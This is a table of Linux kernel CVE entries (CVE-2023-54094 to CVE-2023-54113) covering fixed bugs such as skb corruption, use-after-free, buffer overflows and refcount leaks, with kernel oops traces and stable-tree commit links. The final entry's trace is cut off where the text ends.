| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: prevent skb corruption on frag list segmentation Ian reported several skb corruptions triggered by rx-gro-list, collecting different oops alike: [ 62.624003] BUG: kernel NULL pointer dereference, address: 00000000000000c0 [ 62.631083] #PF: supervisor read access in kernel mode [ 62.636312] #PF: error_code(0x0000) - not-present page [ 62.641541] PGD 0 P4D 0 [ 62.644174] Oops: 0000 [#1] PREEMPT SMP NOPTI [ 62.648629] CPU: 1 PID: 913 Comm: napi/eno2-79 Not tainted 6.4.0 #364 [ 62.655162] Hardware name: Supermicro Super Server/A2SDi-12C-HLN4F, BIOS 1.7a 10/13/2022 [ 62.663344] RIP: 0010:__udp_gso_segment (./include/linux/skbuff.h:2858 ./include/linux/udp.h:23 net/ipv4/udp_offload.c:228 net/ipv4/udp_offload.c:261 net/ipv4/udp_offload.c:277) [ 62.687193] RSP: 0018:ffffbd3a83b4f868 EFLAGS: 00010246 [ 62.692515] RAX: 00000000000000ce RBX: 0000000000000000 RCX: 0000000000000000 [ 62.699743] RDX: ffffa124def8a000 RSI: 0000000000000079 RDI: ffffa125952a14d4 [ 62.706970] RBP: ffffa124def8a000 R08: 0000000000000022 R09: 00002000001558c9 [ 62.714199] R10: 0000000000000000 R11: 00000000be554639 R12: 00000000000000e2 [ 62.721426] R13: ffffa125952a1400 R14: ffffa125952a1400 R15: 00002000001558c9 [ 62.728654] FS: 0000000000000000(0000) GS:ffffa127efa40000(0000) knlGS:0000000000000000 [ 62.736852] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 62.742702] CR2: 00000000000000c0 CR3: 00000001034b0000 CR4: 00000000003526e0 [ 62.749948] Call Trace: [ 62.752498] <TASK> [ 62.779267] inet_gso_segment (net/ipv4/af_inet.c:1398) [ 62.787605] skb_mac_gso_segment (net/core/gro.c:141) [ 62.791906] __skb_gso_segment (net/core/dev.c:3403 (discriminator 2)) [ 62.800492] validate_xmit_skb (./include/linux/netdevice.h:4862 net/core/dev.c:3659) [ 62.804695] validate_xmit_skb_list (net/core/dev.c:3710) [ 62.809158] sch_direct_xmit (net/sched/sch_generic.c:330) [ 62.813198] __dev_queue_xmit (net/core/dev.c:3805 net/core/dev.c:4210) net/netfilter/core.c:626) [ 62.821093] br_dev_queue_push_xmit (net/bridge/br_forward.c:55) [ 62.825652] maybe_deliver (net/bridge/br_forward.c:193) [ 62.829420] br_flood (net/bridge/br_forward.c:233) [ 62.832758] br_handle_frame_finish (net/bridge/br_input.c:215) [ 62.837403] br_handle_frame (net/bridge/br_input.c:298 net/bridge/br_input.c:416) [ 62.851417] __netif_receive_skb_core.constprop.0 (net/core/dev.c:5387) [ 62.866114] __netif_receive_skb_list_core (net/core/dev.c:5570) [ 62.871367] netif_receive_skb_list_internal (net/core/dev.c:5638 net/core/dev.c:5727) [ 62.876795] napi_complete_done (./include/linux/list.h:37 ./include/net/gro.h:434 ./include/net/gro.h:429 net/core/dev.c:6067) [ 62.881004] ixgbe_poll (drivers/net/ethernet/intel/ixgbe/ixgbe_main.c:3191) [ 62.893534] __napi_poll (net/core/dev.c:6498) [ 62.897133] napi_threaded_poll (./include/linux/netpoll.h:89 net/core/dev.c:6640) [ 62.905276] kthread (kernel/kthread.c:379) [ 62.913435] ret_from_fork (arch/x86/entry/entry_64.S:314) [ 62.917119] </TASK> In the critical scenario, rx-gro-list GRO-ed packets are fed, via a bridge, both to the local input path and to an egress device (tun). The segmentation of such packets unsafely writes to the cloned skbs with shared heads. This change addresses the issue by uncloning as needed the to-be-segmented skbs. | 2025-12-24 | not yet calculated | CVE-2023-54094 | https://git.kernel.org/stable/c/bc3ab5d2ab69823f5cff89cf74ef78ffa0386c9a https://git.kernel.org/stable/c/ea438eed94ac0fe69b93ac034738823c0e989a12 https://git.kernel.org/stable/c/1731234e8b60063eae858c77b55c7a88f5084353 https://git.kernel.org/stable/c/7a59f29961cf97b98b02acaadf5a0b1f8dde938c https://git.kernel.org/stable/c/c329b261afe71197d9da83c1f18eb45a7e97e089 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/iommu: Fix notifiers being shared by PCI and VIO buses fail_iommu_setup() registers the fail_iommu_bus_notifier struct to both PCI and VIO buses. struct notifier_block is a linked list node, so this causes any notifiers later registered to either bus type to also be registered to the other since they share the same node. This causes issues in (at least) the vgaarb code, which registers a notifier for PCI buses. pci_notify() ends up being called on a vio device, converted with to_pci_dev() even though it's not a PCI device, and finally makes a bad access in vga_arbiter_add_pci_device() as discovered with KASAN: BUG: KASAN: slab-out-of-bounds in vga_arbiter_add_pci_device+0x60/0xe00 Read of size 4 at addr c000000264c26fdc by task swapper/0/1 Call Trace: dump_stack_lvl+0x1bc/0x2b8 (unreliable) print_report+0x3f4/0xc60 kasan_report+0x244/0x698 __asan_load4+0xe8/0x250 vga_arbiter_add_pci_device+0x60/0xe00 pci_notify+0x88/0x444 notifier_call_chain+0x104/0x320 blocking_notifier_call_chain+0xa0/0x140 device_add+0xac8/0x1d30 device_register+0x58/0x80 vio_register_device_node+0x9ac/0xce0 vio_bus_scan_register_devices+0xc4/0x13c __machine_initcall_pseries_vio_device_init+0x94/0xf0 do_one_initcall+0x12c/0xaa8 kernel_init_freeable+0xa48/0xba8 kernel_init+0x64/0x400 ret_from_kernel_thread+0x5c/0x64 Fix this by creating separate notifier_block structs for each bus type. [mpe: Add #ifdef to fix CONFIG_IBMVIO=n build] | 2025-12-24 | not yet calculated | CVE-2023-54095 | https://git.kernel.org/stable/c/dc0d107e624ca96aef6dd8722eb33ba3a6d157b0 https://git.kernel.org/stable/c/075a4dcdbc9a5ea793cb8ec8b78a6c0b7636fd52 https://git.kernel.org/stable/c/65bf8a196ba25cf65a858b5bb8de80f0aad76691 https://git.kernel.org/stable/c/f08944e3c6962b00827de7263a9e20688e79ad84 https://git.kernel.org/stable/c/a9ddbfed53465bc7c411231db32a488066c0c1be https://git.kernel.org/stable/c/f17d5efaafba3d5f02f0373f7c5f44711d676f3e https://git.kernel.org/stable/c/c46af58588253e5e4063bb5ddc78cd12fdf9e55d https://git.kernel.org/stable/c/6670c65bf863cd0d44ca24d4c10ef6755b8d9529 https://git.kernel.org/stable/c/c37b6908f7b2bd24dcaaf14a180e28c9132b9c58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soundwire: fix enumeration completion The soundwire subsystem uses two completion structures that allow drivers to wait for soundwire device to become enumerated on the bus and initialised by their drivers, respectively. The code implementing the signalling is currently broken as it does not signal all current and future waiters and also uses the wrong reinitialisation function, which can potentially lead to memory corruption if there are still waiters on the queue. Not signalling future waiters specifically breaks sound card probe deferrals as codec drivers can not tell that the soundwire device is already attached when being reprobed. Some codec runtime PM implementations suffer from similar problems as waiting for enumeration during resume can also timeout despite the device already having been enumerated. | 2025-12-24 | not yet calculated | CVE-2023-54096 | https://git.kernel.org/stable/c/48d1d0ce0782f995fda678508fdae35c5e9593f0 https://git.kernel.org/stable/c/a36b522767f3a72688893a472e80c9aa03e67eda https://git.kernel.org/stable/c/e1d54962a63b6ec04ed0204a3ecca942fde3a6fe https://git.kernel.org/stable/c/c5265691cd065464d795de5666dcfb89c26b9bc1 https://git.kernel.org/stable/c/c40d6b3249b11d60e09d81530588f56233d9aa44 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: regulator: stm32-pwr: fix of_iomap leak Smatch reports: drivers/regulator/stm32-pwr.c:166 stm32_pwr_regulator_probe() warn: 'base' from of_iomap() not released on lines: 151,166. In stm32_pwr_regulator_probe(), base is not released when devm_kzalloc() fails to allocate memory or devm_regulator_register() fails to register a new regulator device, which may cause a leak. To fix this issue, replace of_iomap() with devm_platform_ioremap_resource(). devm_platform_ioremap_resource() is a specialized function for platform devices. It allows 'base' to be automatically released whether the probe function succeeds or fails. Besides, use IS_ERR(base) instead of !base as the return value of devm_platform_ioremap_resource() can either be a pointer to the remapped memory or an ERR_PTR() encoded error code if the operation fails. | 2025-12-24 | not yet calculated | CVE-2023-54097 | https://git.kernel.org/stable/c/824683dbec234a01bd49a0589ee3323594a6f4cf https://git.kernel.org/stable/c/dfce9bb3517a78507cf96f9b83948d0b81338afa https://git.kernel.org/stable/c/ad6481f49fb2c703efa3a929643934f24b666d6a https://git.kernel.org/stable/c/f25994f7a9ad53eb756bc4869497c3ebe281ad5e https://git.kernel.org/stable/c/c091bb49b3233307c7af73dae888f0799752af3d https://git.kernel.org/stable/c/0ad07e02be0d3f0d554653382ffe53ae4879378d https://git.kernel.org/stable/c/c4a413e56d16a2ae84e6d8992f215c4dcc7fac20 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gvt: fix gvt debugfs destroy When gvt debug fs is destroyed, need to have a sane check if drm minor's debugfs root is still available or not, otherwise in case like device remove through unbinding, drm minor's debugfs directory has already been removed, then intel_gvt_debugfs_clean() would act upon dangling pointer like below oops. i915 0000:00:02.0: Direct firmware load for i915/gvt/vid_0x8086_did_0x1926_rid_0x0a.golden_hw_state failed with error -2 i915 0000:00:02.0: MDEV: Registered Console: switching to colour dummy device 80x25 i915 0000:00:02.0: MDEV: Unregistering BUG: kernel NULL pointer dereference, address: 00000000000000a0 PGD 0 P4D 0 Oops: 0002 [#1] PREEMPT SMP PTI CPU: 2 PID: 2486 Comm: gfx-unbind.sh Tainted: G I 6.1.0-rc8+ #15 Hardware name: Dell Inc. XPS 13 9350/0JXC1H, BIOS 1.13.0 02/10/2020 RIP: 0010:down_write+0x1f/0x90 Code: 1d ff ff 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 53 48 89 fb e8 62 c0 ff ff bf 01 00 00 00 e8 28 5e 31 ff 31 c0 ba 01 00 00 00 <f0> 48 0f b1 13 75 33 65 48 8b 04 25 c0 bd 01 00 48 89 43 08 bf 01 RSP: 0018:ffff9eb3036ffcc8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: 00000000000000a0 RCX: ffffff8100000000 RDX: 0000000000000001 RSI: 0000000000000064 RDI: ffffffffa48787a8 RBP: ffff9eb3036ffd30 R08: ffffeb1fc45a0608 R09: ffffeb1fc45a05c0 R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000 R13: ffff91acc33fa328 R14: ffff91acc033f080 R15: ffff91acced533e0 FS: 00007f6947bba740(0000) GS:ffff91ae36d00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000000a0 CR3: 00000001133a2002 CR4: 00000000003706e0 Call Trace: <TASK> simple_recursive_removal+0x9f/0x2a0 ? start_creating.part.0+0x120/0x120 ? _raw_spin_lock+0x13/0x40 debugfs_remove+0x40/0x60 intel_gvt_debugfs_clean+0x15/0x30 [kvmgt] intel_gvt_clean_device+0x49/0xe0 [kvmgt] intel_gvt_driver_remove+0x2f/0xb0 i915_driver_remove+0xa4/0xf0 i915_pci_remove+0x1a/0x30 pci_device_remove+0x33/0xa0 device_release_driver_internal+0x1b2/0x230 unbind_store+0xe0/0x110 kernfs_fop_write_iter+0x11b/0x1f0 vfs_write+0x203/0x3d0 ksys_write+0x63/0xe0 do_syscall_64+0x37/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd RIP: 0033:0x7f6947cb5190 Code: 40 00 48 8b 15 71 9c 0d 00 f7 d8 64 89 02 48 c7 c0 ff ff ff ff eb b7 0f 1f 00 80 3d 51 24 0e 00 00 74 17 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 58 c3 0f 1f 80 00 00 00 00 48 83 ec 28 48 89 RSP: 002b:00007ffcbac45a28 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 000000000000000d RCX: 00007f6947cb5190 RDX: 000000000000000d RSI: 0000555e35c866a0 RDI: 0000000000000001 RBP: 0000555e35c866a0 R08: 0000000000000002 R09: 0000555e358cb97c R10: 0000000000000000 R11: 0000000000000202 R12: 0000000000000001 R13: 000000000000000d R14: 0000000000000000 R15: 0000555e358cb8e0 </TASK> Modules linked in: kvmgt CR2: 00000000000000a0 ---[ end trace 0000000000000000 ]--- | 2025-12-24 | not yet calculated | CVE-2023-54098 | https://git.kernel.org/stable/c/bb7c7b2c89d2feb347b6f9bffc1c75987adb1048 https://git.kernel.org/stable/c/ae9a61511736cc71a99f01e8b7b90f6fb6128ed8 https://git.kernel.org/stable/c/b85c8536fda3d1ed07c6d87a661ffe18d6eb214b https://git.kernel.org/stable/c/fe340500baf84b6531c9fc508b167525b9bf6446 https://git.kernel.org/stable/c/c4b850d1f448a901fbf4f7f36dec38c84009b489 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: fs: Protect reconfiguration of sb read-write from racing writes The reconfigure / remount code takes a lot of effort to protect filesystem's reconfiguration code from racing writes on remounting read-only. However during remounting read-only filesystem to read-write mode userspace writes can start immediately once we clear SB_RDONLY flag. This is inconvenient for example for ext4 because we need to do some writes to the filesystem (such as preparation of quota files) before we can take userspace writes so we are clearing SB_RDONLY flag before we are fully ready to accept userpace writes and syzbot has found a way to exploit this [1]. Also as far as I'm reading the code the filesystem remount code was protected from racing writes in the legacy mount path by the mount's MNT_READONLY flag so this is relatively new problem. It is actually fairly easy to protect remount read-write from racing writes using sb->s_readonly_remount flag so let's just do that instead of having to workaround these races in the filesystem code. [1] https://lore.kernel.org/all/00000000000006a0df05f6667499@google.com/T/ | 2025-12-24 | not yet calculated | CVE-2023-54099 | https://git.kernel.org/stable/c/0336b42456e485fda1006b5b411e7372e20fbf03 https://git.kernel.org/stable/c/7e4e87ec56aa6d008c64eab31b340a7c452b26cc https://git.kernel.org/stable/c/0ccfe21949bc9f706a86ee7351b74375c0745757 https://git.kernel.org/stable/c/295ef44a2abaf97d7a594b1d4c60d4be3738191f https://git.kernel.org/stable/c/4abda85197ba5d695e6040d580b4b409ce0d3733 https://git.kernel.org/stable/c/c541dce86c537714b6761a79a969c1623dfa222b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qedi: Fix use after free bug in qedi_remove() In qedi_probe() we call __qedi_probe() which initializes &qedi->recovery_work with qedi_recovery_handler() and &qedi->board_disable_work with qedi_board_disable_work(). When qedi_schedule_recovery_handler() is called, schedule_delayed_work() will finally start the work. In qedi_remove(), which is called to remove the driver, the following sequence may be observed: Fix this by finishing the work before cleanup in qedi_remove(). CPU0 CPU1 |qedi_recovery_handler qedi_remove | __qedi_remove | iscsi_host_free | scsi_host_put | //free shost | |iscsi_host_for_each_session |//use qedi->shost Cancel recovery_work and board_disable_work in __qedi_remove(). | 2025-12-24 | not yet calculated | CVE-2023-54100 | https://git.kernel.org/stable/c/fa19c533ab19161298f0780bcc6523af88f6fd20 https://git.kernel.org/stable/c/5e756a59cee6a8a79b9059c5bdf0ecbf5bb8d151 https://git.kernel.org/stable/c/3738a230831e861503119ee2691c4a7dc56ed60a https://git.kernel.org/stable/c/89f6023fc321c958a0fb11f143a6eb4544ae3940 https://git.kernel.org/stable/c/124027cd1a624ce0347adcd59241a9966a726b22 https://git.kernel.org/stable/c/c5749639f2d0a1f6cbe187d05f70c2e7c544d748 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: driver: soc: xilinx: use _safe loop iterator to avoid a use after free The hash_for_each_possible() loop dereferences "eve_data" to get the next item on the list. However the loop frees eve_data so it leads to a use after free. Use hash_for_each_possible_safe() instead. | 2025-12-24 | not yet calculated | CVE-2023-54101 | https://git.kernel.org/stable/c/49fca83f6f3f0cafe5bf5b43e8ee81cf73c2d5e0 https://git.kernel.org/stable/c/f16599e638073ef0b2828bb64f5e99138e9381b5 https://git.kernel.org/stable/c/256aace3a5d8c987183ba4832dffb36f48ea7d3b https://git.kernel.org/stable/c/c58da0ba3e5c86e51e2c1557afaf6f71e00c4533 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: lpfc: Prevent lpfc_debugfs_lockstat_write() buffer overflow A static code analysis tool flagged the possibility of buffer overflow when using copy_from_user() for a debugfs entry. Currently, it is possible that copy_from_user() copies more bytes than what would fit in the mybuf char array. Add a min() restriction check between sizeof(mybuf) - 1 and nbytes passed from the userspace buffer to protect against buffer overflow. | 2025-12-24 | not yet calculated | CVE-2023-54102 | https://git.kernel.org/stable/c/644a9d5e22761a41d5005a26996a643da96de962 https://git.kernel.org/stable/c/e0e7faee3a7dd6f51350cda64997116a247eb045 https://git.kernel.org/stable/c/f91037487036e2d2f18d3c2481be6b9a366bde7f https://git.kernel.org/stable/c/a9df88cb31dcbd72104ec5883f35cbc1fb587e47 https://git.kernel.org/stable/c/ad050f6cf681ebb850a9d4bc19474d3896476301 https://git.kernel.org/stable/c/c6087b82a9146826564a55c5ca0164cac40348f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mtk-jpeg: Fix use after free bug due to uncanceled work In mtk_jpeg_probe, &jpeg->job_timeout_work is bound with mtk_jpeg_job_timeout_work. Then mtk_jpeg_dec_device_run and mtk_jpeg_enc_device_run may be called to start the work. If we remove the module which will call mtk_jpeg_remove to make cleanup, there may be a unfinished work. The possible sequence is as follows, which will cause a typical UAF bug. Fix it by canceling the work before cleanup in the mtk_jpeg_remove CPU0 CPU1 |mtk_jpeg_job_timeout_work mtk_jpeg_remove | v4l2_m2m_release | kfree(m2m_dev); | | | v4l2_m2m_get_curr_priv | m2m_dev->curr_ctx //use | 2025-12-24 | not yet calculated | CVE-2023-54103 | https://git.kernel.org/stable/c/d346a2ef6b1ebb77d740890cfaf8478c5b286380 https://git.kernel.org/stable/c/d56dbfe750a8f96789cc86a911864f663e63bc5d https://git.kernel.org/stable/c/715c0200b4809396998e562ce5cd0284e7314cc1 https://git.kernel.org/stable/c/8977d9924843823f46696d7d9432ea4b2499ed14 https://git.kernel.org/stable/c/2fc20f8bcc2b4d31c808a5320506c31aa2cf3834 https://git.kernel.org/stable/c/c677d7ae83141d390d1253abebafa49c962afb52 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: rawnand: fsl_upm: Fix an off-by one test in fun_exec_op() 'op-cs' is copied in 'fun->mchip_number' which is used to access the 'mchip_offsets' and the 'rnb_gpio' arrays. These arrays have NAND_MAX_CHIPS elements, so the index must be below this limit. Fix the sanity check in order to avoid the NAND_MAX_CHIPS value. This would lead to out-of-bound accesses. | 2025-12-24 | not yet calculated | CVE-2023-54104 | https://git.kernel.org/stable/c/1f09d67d390647f83f8f9d26382b0daa43756e6f https://git.kernel.org/stable/c/eb7a5e4d14c8659cb97db6863316280e15f67209 https://git.kernel.org/stable/c/f4b700c71802c81e6f9dce362ee7a0312c8377ba https://git.kernel.org/stable/c/49e57caf967a969f6b955c88805f2d160910aa12 https://git.kernel.org/stable/c/c6abce60338aa2080973cd95be0aedad528bb41f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: can: isotp: check CAN address family in isotp_bind() Add missing check to block non-AF_CAN binds. Syzbot created some code which matched the right sockaddr struct size but used AF_XDP (0x2C) instead of AF_CAN (0x1D) in the address family field: bind$xdp(r2, &(0x7f0000000540)={0x2c, 0x0, r4, 0x0, r2}, 0x10) ^^^^ This has no funtional impact but the userspace should be notified about the wrong address family field content. | 2025-12-24 | not yet calculated | CVE-2023-54105 | https://git.kernel.org/stable/c/de3c02383aa678f6799402ac47fdd89cf4bfcaa9 https://git.kernel.org/stable/c/2fc6f337257f4f7c21ecff429241f7acaa6df4e8 https://git.kernel.org/stable/c/9427584c2f153d0677ef3bad6f44028c60d728c4 https://git.kernel.org/stable/c/dd4faace51e41a82a8c0770ee0cc26088f9d9d06 https://git.kernel.org/stable/c/c6adf659a8ba85913e16a571d5a9bcd17d3d1234 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mlx5: fix potential memory leak in mlx5e_init_rep_rx The memory pointed to by the priv->rx_res pointer is not freed in the error path of mlx5e_init_rep_rx, which can lead to a memory leak. Fix by freeing the memory in the error path, thereby making the error path identical to mlx5e_cleanup_rep_rx(). | 2025-12-24 | not yet calculated | CVE-2023-54106 | https://git.kernel.org/stable/c/0582a3caaa3e2f7b80bcb113ad3c910eac15a63e https://git.kernel.org/stable/c/c265d8c2e25546a6b7ee16d36f2bb79b6160c2c3 https://git.kernel.org/stable/c/c6cf0b6097bf1bf1b2a89b521e9ecd26b581a93a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: blk-cgroup: dropping parent refcount after pd_free_fn() is done Some cgroup policies will access parent pd through child pd even after pd_offline_fn() is done. If pd_free_fn() for parent is called before child, then UAF can be triggered. Hence it's better to guarantee the order of pd_free_fn(). Currently refcount of parent blkg is dropped in __blkg_release(), which is before pd_free_fn() is called in blkg_free_work_fn() while blkg_free_work_fn() is called asynchronously. This patch make sure pd_free_fn() called from removing cgroup is ordered by delaying dropping parent refcount after calling pd_free_fn() for child. BTW, pd_free_fn() will also be called from blkcg_deactivate_policy() from deleting device, and following patches will guarantee the order. | 2025-12-24 | not yet calculated | CVE-2023-54107 | https://git.kernel.org/stable/c/c7241babf0855d8a6180cd1743ff0ec34de40b4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: qla2xxx: Fix DMA-API call trace on NVMe LS requests The following message and call trace was seen with debug kernels: DMA-API: qla2xxx 0000:41:00.0: device driver failed to check map error [device address=0x00000002a3ff38d8] [size=1024 bytes] [mapped as single] WARNING: CPU: 0 PID: 2930 at kernel/dma/debug.c:1017 check_unmap+0xf42/0x1990 Call Trace: debug_dma_unmap_page+0xc9/0x100 qla_nvme_ls_unmap+0x141/0x210 [qla2xxx] Remove DMA mapping from the driver altogether, as it is already done by FC layer. This prevents the warning. | 2025-12-24 | not yet calculated | CVE-2023-54108 | https://git.kernel.org/stable/c/3a564de3a299856f2cbd289649cea2e20d671a43 https://git.kernel.org/stable/c/e596253113b69b4018818260bd5da40c201bee73 https://git.kernel.org/stable/c/77302fb0e357da666d5249a6e91078feeef3dade https://git.kernel.org/stable/c/3ee4f1991c54c6707aa9df47e51c02ea25bb63e3 https://git.kernel.org/stable/c/ad6af23593594402c826eefdf43ae174e5f0f202 https://git.kernel.org/stable/c/c75e6aef5039830cce5d4cf764dd204522f89e6b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: rcar_fdp1: Fix refcount leak in probe and remove function rcar_fcp_get() take reference, which should be balanced with rcar_fcp_put(). Add missing rcar_fcp_put() in fdp1_remove and the error paths of fdp1_probe() to fix this. [hverkuil: resolve merge conflict, remove() is now void] | 2025-12-24 | not yet calculated | CVE-2023-54109 | https://git.kernel.org/stable/c/418a8f3140e07f33bbd5a81625d0ef46c0732cef https://git.kernel.org/stable/c/9df630dafa1a59946d1da6f070d4cb64f14ea57c https://git.kernel.org/stable/c/1acb982e3616e70128994fdecf2368a259c8a489 https://git.kernel.org/stable/c/2322b262d2205720518785c2706a3283725ba402 https://git.kernel.org/stable/c/45b7461d914c867ef21c74798da8c42d13d3a0df https://git.kernel.org/stable/c/59c6addfaaaa09ff7654e4d8793cb16fd22a46d4 https://git.kernel.org/stable/c/48765ca7c6b71bf73a4cc8475a4bad9e2633cf61 https://git.kernel.org/stable/c/c766c90faf93897b77c9c5daa603cffab85ba907 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: rndis_host: Secure rndis_query check against int overflow Variables off and len typed as uint32 in rndis_query function are controlled by incoming RNDIS response message thus their value may be manipulated. Setting off to a unexpectetly large value will cause the sum with len and 8 to overflow and pass the implemented validation step. Consequently the response pointer will be referring to a location past the expected buffer boundaries allowing information leakage e.g. via RNDIS_OID_802_3_PERMANENT_ADDRESS OID. | 2025-12-24 | not yet calculated | CVE-2023-54110 | https://git.kernel.org/stable/c/55782f6d63a5a3dd3b84c1e0627738fc5b146b4e https://git.kernel.org/stable/c/02ffb4ecf0614c58e3d0e5bfbe99588c9ddc77c0 https://git.kernel.org/stable/c/ebe6d2fcf7835f98cdbb1bd5e0414be20c321578 https://git.kernel.org/stable/c/232ef345e5d76e5542f430a29658a85dbef07f0b https://git.kernel.org/stable/c/11cd4ec6359d90b13ffb8f85a9df8637f0cf8d95 https://git.kernel.org/stable/c/39eadaf5611ddd064ad1c53da65c02d2b0fe22a4 https://git.kernel.org/stable/c/a713602807f32afc04add331410c77ef790ef77a https://git.kernel.org/stable/c/c7dd13805f8b8fc1ce3b6d40f6aff47e66b72ad2 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: pinctrl: rockchip: Fix refcount leak in rockchip_pinctrl_parse_groups of_find_node_by_phandle() returns a node pointer with refcount incremented, We should use of_node_put() on it when not needed anymore. Add missing of_node_put() to avoid refcount leak. | 2025-12-24 | not yet calculated | CVE-2023-54111 | https://git.kernel.org/stable/c/aa017ab5716c9157c65fdce061c4a4a568af53a8 https://git.kernel.org/stable/c/5868013522297bf628eee4322d99d6d4de4f308e https://git.kernel.org/stable/c/954a7a0011d94475f8ba5ceb77a5d11e01cf402f https://git.kernel.org/stable/c/d562054a3a2eede3507a5461011ee82b671fcb88 https://git.kernel.org/stable/c/0f735f232ff59863e0b6ebac0849d637e215a9c2 https://git.kernel.org/stable/c/dbef00ef4b9b98d15183340396e5df0fa7a860d8 https://git.kernel.org/stable/c/3c40b34e3462aab12af3dba77d2e1602afc72e80 https://git.kernel.org/stable/c/c818ae563bf99457f02e8170aabd6b174f629f65 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: Fix memory leak in error path of kcm_sendmsg() syzbot reported a memory leak like below: BUG: memory leak unreferenced object 0xffff88810b088c00 (size 240): comm "syz-executor186", pid 5012, jiffies 4294943306 (age 13.680s) hex dump (first 32 bytes): 00 89 08 0b 81 88 ff ff 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace: [<ffffffff83e5d5ff>] __alloc_skb+0x1ef/0x230 net/core/skbuff.c:634 [<ffffffff84606e59>] alloc_skb include/linux/skbuff.h:1289 [inline] [<ffffffff84606e59>] kcm_sendmsg+0x269/0x1050 net/kcm/kcmsock.c:815 [<ffffffff83e479c6>] sock_sendmsg_nosec net/socket.c:725 [inline] [<ffffffff83e479c6>] sock_sendmsg+0x56/0xb0 net/socket.c:748 [<ffffffff83e47f55>] ____sys_sendmsg+0x365/0x470 net/socket.c:2494 [<ffffffff83e4c389>] ___sys_sendmsg+0xc9/0x130 net/socket.c:2548 [<ffffffff83e4c536>] __sys_sendmsg+0xa6/0x120 net/socket.c:2577 [<ffffffff84ad7bb8>] do_syscall_x64 arch/x86/entry/common.c:50 [inline] [<ffffffff84ad7bb8>] do_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80 [<ffffffff84c0008b>] entry_SYSCALL_64_after_hwframe+0x63/0xcd In kcm_sendmsg(), kcm_tx_msg(head)->last_skb is used as a cursor to append newly allocated skbs to 'head'. If some bytes are copied, an error occurred, and jumped to out_error label, 'last_skb' is left unmodified. A later kcm_sendmsg() will use an obsoleted 'last_skb' reference, corrupting the 'head' frag_list and causing the leak. This patch fixes this issue by properly updating the last allocated skb in 'last_skb'. | 2025-12-24 | not yet calculated | CVE-2023-54112 | https://git.kernel.org/stable/c/8dc7eb757b1652b82725f32e0c89a1e9f6c0e13b https://git.kernel.org/stable/c/5e5554389397e98fafb9efe395d8b4830dd5f042 https://git.kernel.org/stable/c/479c71cda14b3c3a6515773faa39055333eaa2b7 https://git.kernel.org/stable/c/33db24ad811b3576a0c2f8862506763f2be925b0 https://git.kernel.org/stable/c/97275339c34cfbccd65e87bc38fd910ae66c48ba https://git.kernel.org/stable/c/16989de75497574b5fafd174c0c233d5a86858b7 https://git.kernel.org/stable/c/af8085e0fc3207ecbf8b9e7a635c790e36d058c6 https://git.kernel.org/stable/c/c821a88bd720b0046433173185fd841a100d44ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rcu: dump vmalloc memory info safely Currently, for double invoke call_rcu(), will dump rcu_head objects memory info, if the objects is not allocated from the slab allocator, the vmalloc_dump_obj() will be invoke and the vmap_area_lock spinlock need to be held, since the call_rcu() can be invoked in interrupt context, therefore, there is a possibility of spinlock deadlock scenarios. And in Preempt-RT kernel, the rcutorture test also trigger the following lockdep warning: BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:48 in_atomic(): 1, irqs_disabled(): 1, non_block: 0, pid: 1, name: swapper/0 preempt_count: 1, expected: 0 RCU nest depth: 1, expected: 1 3 locks held by swapper/0/1: #0: ffffffffb534ee80 (fullstop_mutex){+.+.}-{4:4}, at: torture_init_begin+0x24/0xa0 #1: ffffffffb5307940 (rcu_read_lock){....}-{1:3}, at: rcu_torture_init+0x1ec7/0x2370 #2: ffffffffb536af40 (vmap_area_lock){+.+.}-{3:3}, at: find_vmap_area+0x1f/0x70 irq event stamp: 565512 hardirqs last enabled at (565511): [<ffffffffb379b138>] __call_rcu_common+0x218/0x940 hardirqs last disabled at (565512): [<ffffffffb5804262>] rcu_torture_init+0x20b2/0x2370 softirqs last enabled at (399112): [<ffffffffb36b2586>] __local_bh_enable_ip+0x126/0x170 softirqs last disabled at (399106): [<ffffffffb43fef59>] inet_register_protosw+0x9/0x1d0 Preemption disabled at: [<ffffffffb58040c3>] rcu_torture_init+0x1f13/0x2370 CPU: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.5.0-rc4-rt2-yocto-preempt-rt+ #15 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x68/0xb0 dump_stack+0x14/0x20 __might_resched+0x1aa/0x280 ? __pfx_rcu_torture_err_cb+0x10/0x10 rt_spin_lock+0x53/0x130 ? find_vmap_area+0x1f/0x70 